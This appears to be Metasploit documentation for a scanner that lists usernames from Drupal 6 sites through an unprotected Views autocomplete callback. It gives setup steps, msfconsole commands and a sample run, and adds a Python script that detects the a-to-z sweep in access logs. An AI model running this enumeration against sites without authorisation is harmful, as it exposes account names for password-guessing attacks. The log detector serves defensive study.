Vulnerable Application
This module exploits an information disclosure vulnerability in the
Views module for Drupal 6. When the Views module
version 6.x-2.11 or earlier is installed, the autocomplete callback for user fields is
accessible without proper authorization. The module brute-forces the first 10 usernames by
iterating through the letters a to z.
Drupal does not consider disclosure of usernames to be a security weakness on its own, but enumerated usernames can be useful for password-guessing attacks.
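As an added defensive example (not part of the module documentation), the following Python script looks for the letter-by-letter autocomplete sweep described above in web server access logs. The callback path and the log lines are assumptions constructed for this example; verify the path against your own Views installation before relying on the pattern.

```python
import re
from collections import defaultdict

# Constructed Apache combined-format access log lines (not from the page);
# 192.168.1.60 sweeps single letters a..e, 10.0.0.5 makes one ordinary lookup.
SAMPLE_LOG = """\
192.168.1.60 - - [19/Mar/2025:12:00:00 +0000] "GET /?q=admin/views/ajax/autocomplete/user/a HTTP/1.1" 200 45 "-" "curl/7.88"
192.168.1.60 - - [19/Mar/2025:12:00:00 +0000] "GET /?q=admin/views/ajax/autocomplete/user/b HTTP/1.1" 200 2 "-" "curl/7.88"
10.0.0.5 - - [19/Mar/2025:12:00:01 +0000] "GET /node/1 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.168.1.60 - - [19/Mar/2025:12:00:01 +0000] "GET /?q=admin/views/ajax/autocomplete/user/c HTTP/1.1" 200 2 "-" "curl/7.88"
10.0.0.5 - - [19/Mar/2025:12:00:02 +0000] "GET /admin/views/ajax/autocomplete/user/joh HTTP/1.1" 200 20 "-" "Mozilla/5.0"
192.168.1.60 - - [19/Mar/2025:12:00:02 +0000] "GET /?q=admin/views/ajax/autocomplete/user/d HTTP/1.1" 200 2 "-" "curl/7.88"
192.168.1.60 - - [19/Mar/2025:12:00:03 +0000] "GET /?q=admin/views/ajax/autocomplete/user/e HTTP/1.1" 200 31 "-" "curl/7.88"
"""

# Combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumed Views 6.x-2.x user autocomplete callback path; the page names only
# the module, so confirm the path on your own site (with or without ?q=).
AUTOCOMPLETE_RE = re.compile(r'admin/views/ajax/autocomplete/user/(?P<prefix>[^/?&\s]*)')


def parse_autocomplete_requests(log_text):
    """Yield (ip, prefix) for every request that hits the user autocomplete callback."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = AUTOCOMPLETE_RE.search(m.group('path'))
        if hit:
            yield m.group('ip'), hit.group('prefix').lower()


def detect_enumeration(log_text, max_prefix_len=1, threshold=5):
    """Flag source IPs that query the callback with at least `threshold` distinct
    prefixes no longer than `max_prefix_len`. A person typing a name sends a
    few longer prefixes; the a-to-z sweep sends many single letters."""
    prefixes = defaultdict(set)
    for ip, prefix in parse_autocomplete_requests(log_text):
        if 0 < len(prefix) <= max_prefix_len:
            prefixes[ip].add(prefix)
    return {ip: sorted(p) for ip, p in prefixes.items() if len(p) >= threshold}


if __name__ == '__main__':
    for ip, letters in detect_enumeration(SAMPLE_LOG).items():
        print(f"possible username enumeration from {ip}: prefixes {''.join(letters)}")
```

Feed a real access log to detect_enumeration and raise the threshold to suit normal traffic on the site; a client that walks most of the alphabet in a few seconds is the signature to alert on.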
Setup
- Install Drupal 6 with the Views module version 6.x-2.11 or earlier.
- Create several user accounts so there is data to enumerate.
- Ensure the Views module is enabled under Administer > Site building > Modules.
Verification Steps
- Start msfconsole
- Do: use auxiliary/scanner/http/drupal_views_user_enum
- Do: set RHOSTS [target IP]
- Do: run
- You should see a list of discovered usernames printed to the console.
Options
TARGETURI
The base path to the Drupal installation. The default value is /. Change this if Drupal is
installed in a subdirectory, for example /drupal/.
Scenarios
Drupal 6.x with Views 6.x-2.11
msf > use auxiliary/scanner/http/drupal_views_user_enum
msf auxiliary(scanner/http/drupal_views_user_enum) > set RHOSTS 192.168.1.50
RHOSTS => 192.168.1.50
msf auxiliary(scanner/http/drupal_views_user_enum) > set TARGETURI /
TARGETURI => /
msf auxiliary(scanner/http/drupal_views_user_enum) > run
[*] Begin enumerating users at 192.168.1.50
[+] Found User: admin
[+] Found User: john
[+] Found User: testuser
[*] Done. 3 usernames found...
[*] Usernames stored in: /root/.msf4/loot/20250319120000_default_192.168.1.50_drupal_user_123456.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed